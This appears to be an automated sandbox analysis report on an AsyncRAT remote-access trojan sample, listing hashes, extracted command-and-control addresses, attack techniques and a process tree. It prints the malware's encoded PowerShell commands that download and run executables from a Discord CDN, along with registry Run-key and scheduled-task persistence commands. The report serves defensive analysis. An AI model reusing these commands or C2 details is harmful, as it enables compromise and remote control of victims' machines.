asyncrat | c6dda31fa6cb4ce140f62c9ce604672fa4a9ba5d1792f2d77f3cfcb43b3227ac

max time kernel
145s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
12-12-2022 11:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RustExternal_nls.exe
Size

658KB
MD5

1ab8dbca5e2bba39723f00907d266de7
SHA1

729cb808637568f20ac886b3fac5f3cf5ff01dee
SHA256

c6dda31fa6cb4ce140f62c9ce604672fa4a9ba5d1792f2d77f3cfcb43b3227ac
SHA512

d1a31848eb9b683793afd36031ef8078ff962c2526272782cf2fca8db11afb71643a46b9ad6bce3ba8dba1b638672205726f6e96c7dd3e887228a2368ec08081
SSDEEP

12288:3oSO5i2eVUIvybKcEz4MM7S9HdKINesX7j6p9PI8GS0oN2:3ouTVUIvtH4H7aLeO23gRoY

Score

10^/10

asyncrat defendersmartscren system guard runtime persistence rat upx

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

System Guard Runtime

85.105.88.221:2531

Mutex

System Guard Runtime

Attributes

delay
3
install
false
install_file
System Guard Runtime
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

DefenderSmartScren

217.64.31.3:8437

Mutex

DefenderSmartScren

Attributes

delay
3
install
false
install_file
SecurityHealtheurvice.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 2 IoCs

rat

resource	yara_rule
behavioral2/memory/2400-270-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral2/memory/5048-309-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Blocklisted process makes network request 6 IoCs

flow	pid	Process
35	1948	powershell.exe
58	64	powershell.exe
66	1724	powershell.exe
71	1976	powershell.exe
75	4372	powershell.exe
78	4556	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 20 IoCs

pid	Process
4760	DEFENDERFILESECURITY.EXE
940	0.exe
224	gahagoLNMQ.exe
3236	0aQOKpbqSh.exe
4692	MRLjVEAbX4.exe
1604	m7TASdFX2k.exe
1348	LytazJdKBd.exe
4964	0Mjmp5O7Ru.exe
3936	FcoOfTN2qA.exe
2816	gQjw5cdLV3.exe
824	PRNzqO3YaE.exe
2368	yIvJwtAgxW.exe
4128	90qfEXMyuo.exe
3952	HDJ3.exe
3424	DFSH3.exe
3592	FDJSDC41.exe
4580	POQIWE3.exe
2252	HDJ3.exe
404	PODSFB1.exe
5096	MNXAS123.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0003000000022da0-141.dat	upx
behavioral2/files/0x0003000000022da0-140.dat	upx
behavioral2/memory/4760-143-0x00007FF6017E0000-0x00007FF60193F000-memory.dmp	upx
behavioral2/memory/4760-145-0x00007FF6017E0000-0x00007FF60193F000-memory.dmp	upx
behavioral2/files/0x0004000000022dc1-147.dat	upx
behavioral2/files/0x0004000000022dc1-148.dat	upx
behavioral2/memory/940-149-0x00007FF6B43F0000-0x00007FF6B4553000-memory.dmp	upx
behavioral2/memory/940-205-0x00007FF6B43F0000-0x00007FF6B4553000-memory.dmp	upx

Checks computer location settings 2 TTPs 12 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	gahagoLNMQ.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	MRLjVEAbX4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	0Mjmp5O7Ru.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	FcoOfTN2qA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	gQjw5cdLV3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	yIvJwtAgxW.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	0aQOKpbqSh.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	m7TASdFX2k.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	LytazJdKBd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	PRNzqO3YaE.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	90qfEXMyuo.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemGuardRuntime = "C:\\Users\\Admin\\AppData\\Roaming\\SystemGuardRuntime\\SystemGuardRuntime.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealthService = "C:\\Users\\Admin\\AppData\\Roaming\\SecurityHealthService\\SecurityHealthService.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\OperaSetups = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker\\RuntimeBroker.exe"	MNXAS123.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 3284 set thread context of 4880	3284	RustExternal_nls.exe	81
PID 3424 set thread context of 2400	3424	DFSH3.exe	155
PID 3952 set thread context of 5012	3952	HDJ3.exe	159
PID 4580 set thread context of 5048	4580	POQIWE3.exe	166
PID 3592 set thread context of 3032	3592	FDJSDC41.exe	168
PID 2252 set thread context of 4516	2252	HDJ3.exe	175

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4780	404	WerFault.exe	170

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1788	schtasks.exe
3684	schtasks.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings	OpenWith.exe

Suspicious behavior: EnumeratesProcesses 41 IoCs

pid	Process
1948	powershell.exe
1948	powershell.exe
64	powershell.exe
64	powershell.exe
1724	powershell.exe
1724	powershell.exe
1976	powershell.exe
1976	powershell.exe
1948	powershell.exe
4372	powershell.exe
4372	powershell.exe
64	powershell.exe
64	powershell.exe
1976	powershell.exe
1724	powershell.exe
1724	powershell.exe
4556	powershell.exe
4556	powershell.exe
3756	powershell.exe
3756	powershell.exe
1432	powershell.exe
1432	powershell.exe
4372	powershell.exe
3748	powershell.exe
3748	powershell.exe
4592	powershell.exe
4592	powershell.exe
3748	powershell.exe
4504	powershell.exe
4504	powershell.exe
4556	powershell.exe
3756	powershell.exe
4504	powershell.exe
1432	powershell.exe
4592	powershell.exe
4192	powershell.exe
4192	powershell.exe
4192	powershell.exe
5000	powershell.exe
5000	powershell.exe
5000	powershell.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

description	pid	Process
Token: SeDebugPrivilege	1948	powershell.exe
Token: SeDebugPrivilege	64	powershell.exe
Token: SeDebugPrivilege	1724	powershell.exe
Token: SeDebugPrivilege	1976	powershell.exe
Token: SeDebugPrivilege	4372	powershell.exe
Token: SeDebugPrivilege	4556	powershell.exe
Token: SeDebugPrivilege	3756	powershell.exe
Token: SeDebugPrivilege	1432	powershell.exe
Token: SeDebugPrivilege	3748	powershell.exe
Token: SeDebugPrivilege	4592	powershell.exe
Token: SeDebugPrivilege	4504	powershell.exe
Token: SeDebugPrivilege	4192	powershell.exe
Token: SeDebugPrivilege	3952	HDJ3.exe
Token: SeDebugPrivilege	5000	powershell.exe
Token: SeDebugPrivilege	3592	FDJSDC41.exe
Token: SeDebugPrivilege	2252	HDJ3.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3884	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3284 wrote to memory of 4880	3284	RustExternal_nls.exe	81
PID 3284 wrote to memory of 4880	3284	RustExternal_nls.exe	81
PID 3284 wrote to memory of 4880	3284	RustExternal_nls.exe	81
PID 3284 wrote to memory of 4880	3284	RustExternal_nls.exe	81
PID 3284 wrote to memory of 4880	3284	RustExternal_nls.exe	81
PID 3284 wrote to memory of 4880	3284	RustExternal_nls.exe	81
PID 3284 wrote to memory of 4880	3284	RustExternal_nls.exe	81
PID 3284 wrote to memory of 4880	3284	RustExternal_nls.exe	81
PID 3284 wrote to memory of 4880	3284	RustExternal_nls.exe	81
PID 3284 wrote to memory of 4880	3284	RustExternal_nls.exe	81
PID 4880 wrote to memory of 4760	4880	RegAsm.exe	82
PID 4880 wrote to memory of 4760	4880	RegAsm.exe	82
PID 4760 wrote to memory of 3292	4760	DEFENDERFILESECURITY.EXE	84
PID 4760 wrote to memory of 3292	4760	DEFENDERFILESECURITY.EXE	84
PID 3292 wrote to memory of 940	3292	cmd.exe	87
PID 3292 wrote to memory of 940	3292	cmd.exe	87
PID 940 wrote to memory of 3892	940	0.exe	90
PID 940 wrote to memory of 3892	940	0.exe	90
PID 3892 wrote to memory of 224	3892	cmd.exe	92
PID 3892 wrote to memory of 224	3892	cmd.exe	92
PID 940 wrote to memory of 344	940	0.exe	93
PID 940 wrote to memory of 344	940	0.exe	93
PID 940 wrote to memory of 3748	940	0.exe	134
PID 940 wrote to memory of 3748	940	0.exe	134
PID 344 wrote to memory of 3236	344	cmd.exe	95
PID 344 wrote to memory of 3236	344	cmd.exe	95
PID 940 wrote to memory of 1300	940	0.exe	98
PID 940 wrote to memory of 1300	940	0.exe	98
PID 940 wrote to memory of 1040	940	0.exe	101
PID 940 wrote to memory of 1040	940	0.exe	101
PID 3748 wrote to memory of 4692	3748	powershell.exe	100
PID 3748 wrote to memory of 4692	3748	powershell.exe	100
PID 224 wrote to memory of 1948	224	gahagoLNMQ.exe	103
PID 224 wrote to memory of 1948	224	gahagoLNMQ.exe	103
PID 1300 wrote to memory of 1604	1300	cmd.exe	104
PID 1300 wrote to memory of 1604	1300	cmd.exe	104
PID 3236 wrote to memory of 64	3236	0aQOKpbqSh.exe	106
PID 3236 wrote to memory of 64	3236	0aQOKpbqSh.exe	106
PID 940 wrote to memory of 452	940	0.exe	108
PID 940 wrote to memory of 452	940	0.exe	108
PID 1040 wrote to memory of 1348	1040	cmd.exe	111
PID 1040 wrote to memory of 1348	1040	cmd.exe	111
PID 4692 wrote to memory of 1724	4692	MRLjVEAbX4.exe	110
PID 4692 wrote to memory of 1724	4692	MRLjVEAbX4.exe	110
PID 1604 wrote to memory of 1976	1604	m7TASdFX2k.exe	113
PID 1604 wrote to memory of 1976	1604	m7TASdFX2k.exe	113
PID 940 wrote to memory of 3052	940	0.exe	114
PID 940 wrote to memory of 3052	940	0.exe	114
PID 940 wrote to memory of 2136	940	0.exe	117
PID 940 wrote to memory of 2136	940	0.exe	117
PID 1348 wrote to memory of 4372	1348	LytazJdKBd.exe	144
PID 1348 wrote to memory of 4372	1348	LytazJdKBd.exe	144
PID 452 wrote to memory of 4964	452	cmd.exe	118
PID 452 wrote to memory of 4964	452	cmd.exe	118
PID 940 wrote to memory of 1144	940	0.exe	120
PID 940 wrote to memory of 1144	940	0.exe	120
PID 3052 wrote to memory of 3936	3052	cmd.exe	121
PID 3052 wrote to memory of 3936	3052	cmd.exe	121
PID 940 wrote to memory of 3036	940	0.exe	123
PID 940 wrote to memory of 3036	940	0.exe	123
PID 940 wrote to memory of 3668	940	0.exe	126
PID 940 wrote to memory of 3668	940	0.exe	126
PID 2136 wrote to memory of 2816	2136	cmd.exe	143
PID 2136 wrote to memory of 2816	2136	cmd.exe	143

C:\Users\Admin\AppData\Local\Temp\RustExternal_nls.exe
"C:\Users\Admin\AppData\Local\Temp\RustExternal_nls.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3284
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  #cmd
  2⤵
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4880
- - C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE
    "C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4760
  - - C:\Windows\system32\cmd.exe
      "cmd" /C C:\Users\Admin\AppData\Local\Temp\0.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3292
    - - C:\Users\Admin\AppData\Local\Temp\0.exe
        
        C:\Users\Admin\AppData\Local\Temp\0.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:940
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\gahagoLNMQ.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3892
        
        C:\Users\Admin\AppData\Local\Temp\gahagoLNMQ.exe
        
        C:\Users\Admin\AppData\Local\Temp\gahagoLNMQ.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAcgB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADUAMQAxADcAMwA3ADYAOAAxADIAMAAyADQANgA0ADEAMwAvADEAMAA1ADEAMQA3ADUAMQA5ADkANAA0ADMAMgA2ADMANQA3ADkALwBwAGwAbABtAG0AZABpAGkAcABtAC4AZQB4AGUAJwAsACAAPAAjAHEAeQBiACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZgBjAGoAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaABnAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASABEAEoAMwAuAGUAeABlACcAKQApADwAIwBpAGMAbgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBtAHMAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZQB1AHEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASABEAEoAMwAuAGUAeABlACcAKQA8ACMAbABwAGsAIwA+AA=="
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1948
        
        C:\Users\Admin\AppData\Roaming\HDJ3.exe
        
        "C:\Users\Admin\AppData\Roaming\HDJ3.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:3952
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        10⤵
        
        PID:5012
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\0aQOKpbqSh.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:344
        
        C:\Users\Admin\AppData\Local\Temp\0aQOKpbqSh.exe
        
        C:\Users\Admin\AppData\Local\Temp\0aQOKpbqSh.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:3236
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAZAB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQAxADEANwAzADcANgA4ADEAMgAwADIANAA2ADQAMQAzAC8AMQAwADUAMQAxADcANQAyADEANAAyADAANwAyADIANQA4ADYANgAvAEMAUgAuAGUAeABlACcALAAgADwAIwBpAHgAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGQAZQB5ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGQAcABqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEQARgBTAEgAMwAuAGUAeABlACcAKQApADwAIwBhAHQAdwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAG0AaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAegBtAG4AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcARABGAFMASAAzAC4AZQB4AGUAJwApADwAIwBuAHoAdgAjAD4A"
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:64
        
        C:\Users\Admin\AppData\Roaming\DFSH3.exe
        
        "C:\Users\Admin\AppData\Roaming\DFSH3.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3424
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime' -Value '"C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe"' -PropertyType 'String'
        10⤵
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4192
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        #cmd
        10⤵
        
        PID:2400
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /C schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        10⤵
        
        PID:1388
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        11⤵
        Creates scheduled task(s)
        
        PID:1788
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\MRLjVEAbX4.exe
        6⤵
        
        PID:3748
        
        C:\Users\Admin\AppData\Local\Temp\MRLjVEAbX4.exe
        
        C:\Users\Admin\AppData\Local\Temp\MRLjVEAbX4.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:4692
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQBtACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQAxADEANwAzADcANgA4ADEAMgAwADIANAA2ADQAMQAzAC8AMQAwADUAMQAxADcANQAyADQAMQAwADAAOAA4ADEAMgAxADAAMgAvAGwAYwBvAG0AcABsAGMAbQBwAG8ALgBlAHgAZQAnACwAIAA8ACMAZQBhAGcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB1AHkAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBwAGIAegAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBGAEQASgBTAEQAQwA0ADEALgBlAHgAZQAnACkAKQA8ACMAaQBiAGcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAawBmAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGYAZABmACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEYARABKAFMARABDADQAMQAuAGUAeABlACcAKQA8ACMAeQB5AGkAIwA+AA=="
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1724
        
        C:\Users\Admin\AppData\Roaming\FDJSDC41.exe
        
        "C:\Users\Admin\AppData\Roaming\FDJSDC41.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:3592
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        10⤵
        
        PID:3032
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\m7TASdFX2k.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1300
        
        C:\Users\Admin\AppData\Local\Temp\m7TASdFX2k.exe
        
        C:\Users\Admin\AppData\Local\Temp\m7TASdFX2k.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:1604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYgB0ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQAxADEANwAzADcANgA4ADEAMgAwADIANAA2ADQAMQAzAC8AMQAwADUAMQAxADcANQAyADYAMAAzADkAMAA2ADgANgA3ADkAMAAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC4AZQB4AGUAJwAsACAAPAAjAGQAcQBoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcgBoAHIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZgBhAHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABPAFEASQBXAEUAMwAuAGUAeABlACcAKQApADwAIwBkAG0AdwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAG0AZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZQBsAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABPAFEASQBXAEUAMwAuAGUAeABlACcAKQA8ACMAYwBkAHMAIwA+AA=="
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1976
        
        C:\Users\Admin\AppData\Roaming\POQIWE3.exe
        
        "C:\Users\Admin\AppData\Roaming\POQIWE3.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4580
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'
        10⤵
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5000
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        10⤵
        
        PID:3012
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        11⤵
        Creates scheduled task(s)
        
        PID:3684
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        #cmd
        10⤵
        
        PID:5048
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\LytazJdKBd.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1040
        
        C:\Users\Admin\AppData\Local\Temp\LytazJdKBd.exe
        
        C:\Users\Admin\AppData\Local\Temp\LytazJdKBd.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:1348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
